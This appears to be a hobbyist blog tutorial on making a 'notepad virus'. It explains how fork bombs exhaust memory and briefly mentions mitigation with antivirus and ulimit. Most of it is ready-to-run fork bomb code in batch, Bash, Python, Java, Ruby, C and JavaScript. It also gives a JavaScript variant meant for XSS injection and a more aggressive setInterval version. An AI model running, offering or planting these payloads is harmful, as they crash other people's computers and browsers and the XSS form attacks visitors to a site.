Greetings readers! Today I will teach you how to make your own harmless computer virus using notepad. You don't need programming knowledge to understand how it works, just follow the simple steps and you will be ready with your own little malware.
 |
| Notepad Virus Scripts |
What are Fork Bombs?
The fork bomb is the equivalent of a DDoS attack on your own system. It aims to deprive the system of memory (RAM), leaving nothing for other applications or the operating system’s vital operations required to keep the systems running, hence crashing it. Just 5 characters long, the fork bomb is not permanently harmful for a computer, just annoying.
And here is the fork bomb:
%0|%0
Yes, this is it. The above is a shorter alternative for the following more comprehensible code:
:s start %0 goto s
 |
| Batch File Virus |
Here, the first line creates a label s.
%0 actually refers to the name of the batch file itself. By start %0 we’re running the same file again.
And finally goto s brings us back to the top, forming a loop.
So every time the loop is run another instance of the same program is started and then both of them run together and again duplicate themselves and so on.
Fork bomb execution
Every program doubling itself is a form of exponential growth. After one iteration of the loop, two programs (21) are created. After another cycle, each of those two create another two for a total of four (22). After 10 iterations we have 1024 (210) instances of our little batch file. After 100 iterations we have 2100 = 1.267 nonillion, a number so big you don’t even know what ‘nonillion’ is (It’s 1030).
The first instance will likely not even complete 50 iterations before the system grinds to a halt and crashes. For such a simple script, each individual iteration would hardly take a few milliseconds, so the first few iterations complete very quickly and soon it becomes more than what the computer can handle.
Mitigation
Any antivirus worth it’s salt would be able to scan this suspicious executable file and warn the user before execution. As a fork bomb’s mode of operation is entirely dependent on being able to create new processes, one way of preventing a fork bomb from severely affecting the entire system is to limit the maximum number of processes that a single user may own. On Linux, this can be achieved by using the ulimit utility; for example, the command ulimit -u 30 would limit the affected user to a maximum of thirty owned processes.
And so we have our first little virus under our belt.
Head over to the next one to continue or scroll down if you’re interested in checking out the code for fork bomb in other common languages.
Bash
:(){ :|:& };: Python import os while 1: os.fork()
Java
public class ForkBomb { public static void main(String[] args) { while(true) { Runtime.getRuntime().exec(new String[]{"javaw", "-cp", System.getProperty("java.class.path"), "ForkBomb"}); } } }
 |
| Java Notepad Virus |
Ruby
loop { fork { load(__FILE__) } } C #include <unistd.h> int main(void) { while(1) { fork(); /* malloc can be used in order to increase the data usage */ } }
 |
| Ruby Notepad Virus |
JavaScript
while (true) { var w = window.open(); w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML); } The following version is easier for injection (XSS): <a href="#" onload="function() { while (true) { var w = window.open(); w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML); } }">XSS fork bomb</a>
 |
| JavaScript Notepad Virus |
And the following is simply a more aggressive version of the above:
<script> setInterval(function() { var w = window.open(); w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML); }, 10);
